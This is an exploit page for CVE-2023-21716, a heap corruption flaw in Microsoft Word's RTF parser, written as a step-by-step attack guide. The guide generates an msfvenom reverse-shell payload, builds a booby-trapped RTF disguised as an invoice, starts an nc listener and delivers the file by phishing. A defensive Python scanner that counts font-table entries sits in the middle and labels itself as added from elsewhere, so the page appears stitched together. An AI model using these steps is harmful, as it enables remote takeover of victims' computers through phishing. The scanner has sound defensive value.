## https://sploitus.com/exploit?id=42DE0E9E-0456-5917-A34D-1F73984A8363
# CVE-2023-21716 — Microsoft Word RTF fonttbl Heap Corruption RCE

**Severity:** Critical (CVSS 9.8)  
**Affected:** Microsoft Word 2013 / 2016 / 2019 / 2021 (unpatched)  
**Patch:** Microsoft February 2023 Patch Tuesday  
**Author:** REGGYRAIDER  

---

## Vulnerability Overview

CVE-2023-21716 is a heap corruption vulnerability in Microsoft Word's RTF parser (`wwlib.dll`).  
When Word parses a `\fonttbl` directive containing **more than 32 767 font entries**, an internal **signed 16-bit counter overflows**, corrupting heap metadata. This allows an attacker to achieve **Remote Code Execution** simply by sending the victim a crafted `.rtf` file.

No macros. No user interaction beyond opening the file.

---

## Setup & Exploit

### Step 1 — Generate raw shellcode with msfvenom
```bash
msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT=4444 -f raw -o payload.bin
```

### Step 2 — Clone this repository
```bash
git clone https://github.com/REGGYRAIDER/CVE-2023-21716
cd CVE-2023-21716
```

### Step 3 — Build the malicious RTF
```bash
python3 exploit.py payload.bin invoice_march2024.rtf
```

### Step 4 — Start your listener
```bash
nc -lvnp 4444
```

### Step 5 — Deliver the file
Upload via SMB, email attachment, or any phishing vector.  
When the victim opens `invoice_march2024.rtf` in an unpatched Word, you receive a reverse shell.

---

## How It Works

```
Attacker creates RTF          Word parses \fonttbl        Heap corrupted
─────────────────────  ──►   ────────────────────────  ──►  ──────────────
\fonttbl with 32769+         Signed 16-bit counter        Attacker's
font definitions             overflows → 0x8000           shellcode runs
```

1. The exploit embeds **32 769 `\f` font definitions** inside `\fonttbl`.  
2. Word allocates a fixed-size buffer based on the (now overflowed) counter.  
3. Subsequent font writes go **past the allocated buffer**, corrupting adjacent heap chunks.  
4. The raw shellcode (from `payload.bin`) is placed inside `\pict` and lands in the corrupted region, gaining execution when the allocator processes it.
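As an added defensive example (not code from this repository), the scanner below parses an RTF file's `\fonttbl` group, counts its `\f<n>` font definitions and reports when that count would wrap the signed 16-bit counter described above. The brace-tracking parser, the regex and the benign sample document are constructed here and assumed to be adequate for triage, not taken from the project or from Word's own parser.

```python
import re
from typing import Optional

# Word's font-table counter is signed 16-bit (as the page describes): a
# count past 32767 wraps negative, and that is the condition flagged here.
INT16_MAX = 32767

# A font definition is "\f" followed by digits. Other \f-words found in a
# font table (\fswiss, \fnil, \fcharset0, \fs24) have a letter after the
# f, so they do not match and are not counted.
FONT_DEF_RE = re.compile(rb"\\f(\d+)")

def to_int16(n: int) -> int:
    """Value a signed 16-bit counter holds after n increments."""
    return ((n + 0x8000) & 0xFFFF) - 0x8000

def extract_fonttbl(data: bytes) -> Optional[bytes]:
    """Return the first {\\fonttbl ...} group, honouring nested braces."""
    pos = data.find(rb"\fonttbl")
    begin = data.rfind(b"{", 0, pos) if pos != -1 else -1
    if begin == -1:
        return None
    depth, i = 0, begin
    while i < len(data):
        c = data[i]
        if c == 0x5C:          # backslash: skip the escaped char (\{ \} \\)
            i += 2
            continue
        if c == 0x7B:          # '{'
            depth += 1
        elif c == 0x7D:        # '}'
            depth -= 1
            if depth == 0:
                return data[begin:i + 1]
        i += 1
    return data[begin:]        # unterminated group: scan to end of file

def analyze_rtf(data: bytes, limit: int = INT16_MAX) -> dict:
    """Count font definitions in the font table; flag an overflowing count."""
    tbl = extract_fonttbl(data)
    count = len(FONT_DEF_RE.findall(tbl)) if tbl else 0
    return {"font_count": count, "counter_int16": to_int16(count),
            "suspicious": count > limit}

# Constructed benign sample (two fonts, one nested group) for comparison.
BENIGN_RTF = (rb"{\rtf1\ansi{\fonttbl{\f0\fswiss\fcharset0 Arial;}"
              rb"{\f1\fnil{\*\panose 02020603050405020304}Times New Roman;}}"
              rb"\f0\fs24 Hello}")
```

Run `analyze_rtf(open(path, "rb").read())` on incoming attachments; a `suspicious` result is a strong signal to quarantine the file before Word ever parses it.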

---

## Disclaimer

> This tool is intended **for educational purposes and authorized penetration testing only**.  
> Using this exploit against systems you do not own or have explicit written permission to test is **illegal**.  
> The author takes no responsibility for misuse.

---

## References

- [Microsoft Security Advisory](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-21716)
- [NVD Entry](https://nvd.nist.gov/vuln/detail/CVE-2023-21716)